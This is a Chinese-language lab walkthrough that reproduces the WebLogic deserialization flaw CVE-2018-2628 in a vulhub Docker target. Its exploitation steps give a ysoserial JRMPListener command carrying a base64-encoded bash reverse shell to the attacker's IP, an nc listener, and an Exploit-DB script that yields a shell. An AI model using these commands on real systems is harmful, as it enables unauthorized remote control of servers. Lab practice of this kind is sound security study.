漏洞简介
2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(Critical Patch Update),更新中修复了一个高危的 WebLogic 反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下通过T3协议对存在漏洞的 WebLogic 组件进行远程攻击,并可获取目标系统所有权限。
漏洞影响
- Weblogic 10.3.6.0
- Weblogic 12.1.3.0
- Weblogic 12.2.1.2
- Weblogic 12.2.1.3
靶场搭建
进入到vulhub-(CVE-2018-2628)靶场环境所在目录,执行如下命令启动Weblogic 10.3.6.0:
docker-compose up -d
打开浏览器,访问靶机的7001端口,查看环境是否搭建成功
http://靶机ip:7001/console/login/LoginForm.jsp
漏洞利用
利用工具:
ysoserial:https://github.com/brianwrf/ysoserial/releases/tag/0.0.6-pri-beta
exploit.py脚本:https://www.exploit-db.com/exploits/44553
进http://www.jackson-t.ca/runtime-exec-payloads.html
将下载好的ysoserial-0.0.6-SNAPSHOT-BETA-all.jar放在kali中,然后在ysoserial-0.0.6-SNAPSHOT-BETA-all.jar所在的目录执行,19111是JRMP Server监听的端口
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 19111 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTc5LzE5MTEwIDA+JjE=}|{base64,-d}|{bash,-i}"
在kali中使用nc监听本地的19110端口
nc -lnvp 19110
在kali中,使用python执行下载好的exp,此处为44553.py
192.168.1.173为靶机的ip,7001为靶场所在的端口,192.168.1.179为kali的ip,19111是JRMP Server监听的端口
python 44553.py 192.168.1.173 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.1.179 19111 JRMPClient
成功getshell